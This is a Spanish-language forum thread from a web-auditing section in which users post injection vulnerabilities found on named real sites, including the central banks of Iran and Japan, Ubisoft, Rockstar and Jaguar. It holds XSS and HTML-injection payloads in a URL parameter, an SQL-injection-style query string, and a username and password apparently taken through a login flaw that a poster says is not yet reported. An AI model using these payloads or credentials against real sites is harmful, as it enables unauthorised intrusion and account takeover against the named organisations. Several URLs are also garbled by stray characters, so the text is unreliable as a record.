Banco Central De Iran:

[Enlace externo eliminado para invitados] 2ror.htm?aspxerrorpath=/pag‚e/1398.aspx
1337 & culture!
Banco de Japon:

[Enlace externo eliminado para invitados] 3/r_menu_koen/index.htm/?pa‚ge=2
1337 & culture!
Ubisoft:

-Sql:

[Enlace externo eliminado para invitados] 4ex.php?p=59&art_id=60&vars‚=Y29tX2lkPTg4OSZzZW5kZXI9SE‚9NRSZzZW5kZXJfdXJsPWluZGV4H <nBocCUzRnNpdF9pZCUzRDImZml‚sdGVyX3R5cGU9JmZpbHRlcl9tb2‚50aD0mZmlsdGVyX3llYXI9

-Xss:

[Enlace externo eliminado para invitados]
1337 & culture!
Rockstar Group:

[Enlace externo eliminado para invitados] ?m/chinatownwars/3.0/feed/?‚locale="><body bgcolor="FF0‚000"></body>

o

[Enlace externo eliminado para invitados] ?m/chinatownwars/3.0/feed/?‚locale=%22%3E%3Ca%20href=%2‚2http://google.com%22%3EBe( 520Happy,%20click%20here%3C‚/a%3E

Metodo: Html Code Injection
1337 & culture!
No sé si estaría reportado pero mi novia... encontró uno en el buscador de Jaguar

[Enlace externo eliminado para invitados]

Quiere dominar el mundo!!
No importa cuan rápida y avanzada sea la tecnología, la mente humana aún es el procesador más versátil y creativo que hay.
Web: [Enlace externo eliminado para invitados]
[Enlace externo eliminado para invitados]
Método: XSS

Hace poco encontraron un xss o bug en el login, no lo recuerdo, creo que en los resultados obtenidos no se dieron cuenta, aquí os lo dejo.

[Enlace externo eliminado para invitados]
UserName:handlerg
Pass :9na7o6O5Xh

Aun no reportado, estoy buscando como...
Siempre por aqui
deck escribió:la foto ni se ve xD no somos adivinos xD
La foto se ve perfecto, dale boton derecho , abrir en nueva pestaña
Imagen
Bueno. Ahora si se vee (le edite el comentario hace media hora). Creía que era la foto de su firma y por eso no me di cuenta antes de que estaba mal puesta .

Mostrar/Ocultar

Volver a “Auditoria Web”